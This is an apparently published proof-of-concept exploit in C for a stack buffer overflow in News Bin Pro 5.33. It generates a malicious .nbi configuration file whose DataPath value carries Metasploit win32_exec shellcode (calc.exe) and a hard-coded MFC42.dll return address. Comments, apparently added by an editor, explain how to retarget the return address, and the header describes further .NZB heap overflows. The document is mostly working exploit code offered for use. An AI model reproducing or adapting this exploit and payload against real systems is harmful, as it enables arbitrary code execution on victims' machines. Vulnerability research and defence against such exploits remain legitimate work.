# Title : News Bin Pro 5.33 (.NBI File) Local Buffer Overflow Exploit
# Published : 2007-02-21
# Author : Marsu
/***************************************************************************
* *
* News Bin Pro 5.33 .NBI File Buffer Overflow exploit *
* *
* *
* There are two buffer overflows in News Bin Pro 5.33 that can be triggered *
* by a crafted .nbi config file. *
* The DataPath and DownloadPath values are copied without a length check, *
* so code execution is possible (this PoC overflows DataPath). *
* *
* This vulnerability also exists in News Bin 4.x but since .nbi is not *
* associated with News Bin this can only be triggered by loading the file *
* manually. *
* *
* I would also add that: *
* -News Bin 4.x is vulnerable to a heap overflow with a .NZB file that *
* contains a long group field. The vulnerability is triggered after *
* starting the download of a malformed post. *
* Impact: DoS for XP SP2, Code exec for XP SP1 and XP. *
* *
* -News Bin 5.33 is vulnerable to a heap overflow with a .NZB file that *
* contains a long group field. The vulnerability is triggered after *
* starting the download of a malformed post and then clicking *
* "Delete All Posts". *
* Impact: code execution on XP and XP SP1, DoS on XP SP2 (code execution *
* there may still be possible, but is not confirmed). *
* *
* Tested on XP SP2 FR. *
* Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr> *
* *
* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P *
***************************************************************************/
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
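/* win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=Pex http://metasploit.com */
/* BAD CHARS ARE 0x00 0x5D 0x5b 0x0a 0x0d */
/*
 * Payload copied to the start of the overflowing DataPath value by main().
 * The listing as published here had lost the backslash of every "\x" escape
 * ("x33xc9..."), which would have written the literal text instead of the
 * bytes; the escapes are restored below. 164 bytes, no NUL, so strlen() and
 * sizeof()-1 agree on its length.
 */
char calcshellcode[] =
"\x33\xc9\x83\xe9\xdd\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x26"
"\x50\xbf\x4b\x83\xee\xfc\xe2\xf4\xda\xb8\xfb\x4b\x26\x50\x34\x0e"
"\x1a\xdb\xc3\x4e\x5e\x51\x50\xc0\x69\x48\x34\x14\x06\x51\x54\x02"
"\xad\x64\x34\x4a\xc8\x61\x7f\xd2\x8a\xd4\x7f\x3f\x21\x91\x75\x46"
"\x27\x92\x54\xbf\x1d\x04\x9b\x4f\x53\xb5\x34\x14\x02\x51\x54\x2d"
"\xad\x5c\xf4\xc0\x79\x4c\xbe\xa0\xad\x4c\x34\x4a\xcd\xd9\xe3\x6f"
"\x22\x93\x8e\x8b\x42\xdb\xff\x7b\xa3\x90\xc7\x47\xad\x10\xb3\xc0"
"\x56\x4c\x12\xc0\x4e\x58\x54\x42\xad\xd0\x0f\x4b\x26\x50\x34\x23"
"\x1a\x0f\x8e\xbd\x46\x06\x36\xb3\xa5\x90\xc4\x1b\x4e\xbf\x71\xab"
"\x46\x38\x27\xb5\xac\x5e\xe8\xb4\xc1\x33\xde\x27\x45\x7e\xda\x33"
"\x43\x50\xbf\x4b";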
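/*
 * Remainder of the generated .nbi file, appended after the overflowing
 * DataPath line. Every "\n" escape had lost its backslash in the published
 * listing (e.g. "path" + "n" + "DiskThreshold"), so the config would have
 * been written as one line; the newlines are restored here. Contains no '%',
 * but main() should still write it with fputs(), not as a format string.
 */
char rest[]="DownloadPath=path\nDiskThreshold=0\nCacheTimeout=14\nUseRateLimit=0\nPurgeRecords=0\nMaxRetries=10\nInitRecords=500000\nThumbCount=3\nUpdateWhenStarted=0\nRecycleServers=0\nShowPAR=0\nSortIgnoreRE=1\nHideIncompletes=0\nMultiTab=1\nAutoOLD=0\nScratchPars=1\nRestartPauseTime=60\nHiRes=0\nUseBwScreenSaver=0\nUseBwTimers=0\nUseBwTimeLimit=0\nLimitOnTime=0\nLimitOffTime=0\nRateLimit=0\nSigCache=1\nAutoSave=1\nAutoShutdown=0\nShowMotd=0\nAssemblePrio=1\nStrictYENC=0\nAutoAssemble=0\nInitBrowsePath=0\nOldPicker=1\nChunkPurge=3\nAutosaveInterva=10\nPostLimiter=0\nMaxPosts=0\n\n"
"[Logging]\nLogging=0\nLogErrors=0\nLogFiles=0\nLogHeaders=0\nLogBody=0\nLogOverwrite=0\n\n"
"[Debug]\nShowCommands=1\n\n"
"[TABS]\nGroupsPos=0\nDownloadPos=2\nScratchPos=2\nFailedPos=2\nFilesPos=2\nShowAutoRAR=1\nAutoRARPos=2\nShowSearch=0\nSearchPos=1\nShowConnections=1\nConnectionPos=2\nShowStatus=1\nStatusPos=2\nShowThumbNails=1\nThumbsPos=2\nShowServers=1\nServersPos=0\nPostsPos=1\nRPBPos=1\nImageDbasePos=1\nDownloadHistoryPos=1\n\n"
"[DESCRIPTIONS]\nFileDescriptions=0\nDescSubject=1\nDescFrom=1\nDescDate=0\n\n"
/* NOTE(review): the '$' before [Filename] is as published; it looks like a
 * transcription artifact rather than part of the format -- verify against a
 * real .nbi before relying on this section being parsed. */
"$[Filename]\nAutoRename=1\nDirectoryMode=1\nMP3_TagMode=0\n\n"
"[IMAGESAFE]\nImageSafe=0\n\n"
/* The published listing had a bare "\d" in the regex below; C treats that as
 * an unknown escape (emitting just 'd'), so it is written as "\\d" to put a
 * literal backslash-d into the file. */
"[Nzb]\nNZB_ObeyGlobal=0\nNZB_DD_Autoload=1\nNZB_ClickToPost=0\nNZB_LoadSingle=0\nNZB_PathClean=1\nNZB_PathCleanRE=^(\\d+_)|(msgid_\\d+_)\nNZB_ScanFolder\nNZB_NameFolder=1\nNZB_AutoToPost=0\n\n"
"[Unsorted]\nFilterProfile=Global\nActive=1\nIsExpanded=1\n\n"
"[Groups]\nalt.binaries.pictures.autos\n\n"
"[alt.binaries.pictures.autos]\nFilterProfile=Global\nActive=1\nParent=Automobiles\n\n"
"[Automobiles]\nFilterProfile=Global\nActive=1\nIsExpanded=1\n\n"
"[Topics]\nAutomobiles\n\n"
"[My_Server]\nAddress=news.free.fr\nActive=1\nUseAuth=0\nPort=119\nSlaveServer=0\nFillServer=0\nConnectionLimit=2\nPriority=0\nBytesDownloaded=0\nUseFirewall=1\nColor=10547360\n\n"
"[Servers]\nMy_Server\n";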
/* Name of the .nbi file main() writes into the current directory. */
char defaultfilename[]="file.nbi";
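/*
 * Generate the malicious .nbi file.
 *
 * Usage: <prog> [output-file]   (defaults to defaultfilename in the cwd)
 *
 * File layout written:
 *   "\n[Settings]\nDataPath=" + 516 bytes + "\n" + rest
 * where the 516-byte DataPath value is:
 *   [0, RET_OFFSET)              calcshellcode, then 'A' padding
 *   [RET_OFFSET, RET_OFFSET + 4) saved-return-address overwrite, little-endian
 * This only writes a file; nothing is executed here. The payload is the
 * calc.exe shellcode above.
 *
 * Returns EXIT_SUCCESS on a fully written file, EXIT_FAILURE otherwise.
 */
int main(int argc, char* argv[]) {
    enum { RET_OFFSET = 512, RET_LEN = 4, PAD_LEN = RET_OFFSET + RET_LEN };
    /* 0x73db82b6: a "call [esp+C]" in MFC42.dll, per the author. He took the
     * first one he found and says it is NOT universal -- swap it for one from
     * the target's MFC42.dll (or a pop/pop/ret) if the file does not fire. */
    static const unsigned char ret_addr[RET_LEN] = { 0xb6, 0x82, 0xdb, 0x73 };
    const size_t shell_len = sizeof(calcshellcode) - 1;
    const char *outname = (argc > 1) ? argv[1] : defaultfilename;

    printf("[+] Newsbin Pro 5.33 Configuration file DataPath Buffer Overflow Exploit\n");
    printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");

    /* The shellcode must fit in front of the return address; a longer payload
     * would silently clobber it (and, with strlen(), overrun the buffer). */
    if (shell_len > RET_OFFSET) {
        fprintf(stderr, "[-] shellcode is %zu bytes, must be <= %d\n", shell_len, RET_OFFSET);
        return EXIT_FAILURE;
    }

    unsigned char *pad = malloc(PAD_LEN);
    if (pad == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }
    memset(pad, 'A', PAD_LEN);
    memcpy(pad, calcshellcode, shell_len);
    memcpy(pad + RET_OFFSET, ret_addr, RET_LEN);

    /* "wb": the newlines must be written raw, not translated on Windows. */
    FILE *file = fopen(outname, "wb");
    if (file == NULL) {
        perror(outname);
        free(pad);
        return EXIT_FAILURE;
    }

    /* pad and rest are written as data, never as a format string: pad holds
     * raw shellcode bytes and the explicit length avoids relying on a NUL. */
    int ok = fputs("\n[Settings]\nDataPath=", file) != EOF
          && fwrite(pad, 1, PAD_LEN, file) == PAD_LEN
          && fputc('\n', file) != EOF
          && fputs(rest, file) != EOF;
    /* fclose() flushes; a failure here means the file on disk is short. */
    ok = (fclose(file) == 0) && ok;
    free(pad);

    if (!ok) {
        fprintf(stderr, "[-] failed to write %s\n", outname);
        return EXIT_FAILURE;
    }
    printf("[+] File generated! Have fun\n");
    return EXIT_SUCCESS;
}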